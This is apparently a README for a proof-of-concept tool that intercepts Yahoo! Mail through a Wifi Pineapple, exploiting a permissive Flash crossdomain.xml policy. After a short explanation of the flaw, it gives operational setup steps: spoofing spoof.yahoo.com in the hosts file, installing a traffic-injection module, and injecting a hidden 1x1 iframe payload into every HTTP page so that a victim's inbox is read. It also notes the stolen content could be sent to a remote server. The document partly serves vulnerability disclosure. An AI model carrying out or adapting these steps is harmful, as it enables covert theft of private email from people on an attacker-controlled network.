YMail-Pineapple – Tools for MITMing Yahoo! Mail with a Wifi Pineapple Mark V and Flash
Yahoo! Mail is vulnerable to active MITM attacks due to problems with its crossdomain.xml policy.
Specifically, Yahoo Mail policy is
<allow-access-from domain=”*.yahoo.com” secure=”false”/>
Per Adobe “using [secure=]false in an HTTPS policy file is not recommended because this compromises the security offered by HTTPS.”
Note that the ability to give insecure documents privileged access to secure resources isn’t unique to Flash’s crossdomain policies. You can make the same mistake with CORS headers (see “Breaking HTTPS”.)
Anywho, since Yahoo still hasn’t fixed this I figured I’d demonstrate that this isn’t just a handwavey warning, and that this makes Yahoo Mail trivially MITMable.
Putting aside aside my concerns about the security of its code, I own a Wifi Pineapple Mark V so the instructions assume you’re using one as well. All of this could be reasonably adapted to any other router that can run vanilla OpenWRT.
How does it work?
First, we intercept every plaintext HTTP response and inject an <iframe> pointing to https://spoof.yahoo.com/grabberFrame.html onto every page. Our device intercepts that request responds with our own document that embeds https://spoof.yahoo.com/MailGrabber.swf. The request for that swf is similarly intercepted and replaced with our own SWF.
We should now have a document on spoof.yahoo.com embedding our own swf loaded in the user’s browser. The document asks the swf to request the user’s YMail page via Flash’s JS<->SWF bridge and the SWF sends the page’s content back to our JS. At this point the content can be leaked to a remote server or something similar, but out demo dumps it onto the page.
This is possible because even though *.mail.yahoo.com has an HSTS policy, uses the Secure flag on the relevant cookies, and always redirects to https, the crossdomain.xml policy gives our SWF served over HTTP privileged access to YMail pages served over HTTPS.
Make sure your Pineapple is connected to the internet via ethernet or a second wifi radio
Install the strip-n-inject infusion ** I needed to run mkdir -p /sd/tmp/ to get strip-n-inject to start but YMMV
SSH into your Pineapple and add 127.0.0.1 spoof.yahoo.com to /etc/hosts so it will read from our internal webserver
rsync the contents of this repo to /www/ on your Pineapple
Configure strip-n-inject to inject the following onto each page:
<iframe width=”1″ height=”1″ src=”https://spoof.yahoo.com/grabberFrame.html”></iframe>
If you don’t want to dump the inbox contents to the current page, edit grabber.js to do something other than postMessage() and remove the receiver.js line from strip-n-inject’s config
At this point you should be ready to test. Make sure you’re logged in on YMail and navigate to https://www.cnn.com/ while connected to the Pineapple’s public interface. You should see a box like Picture Above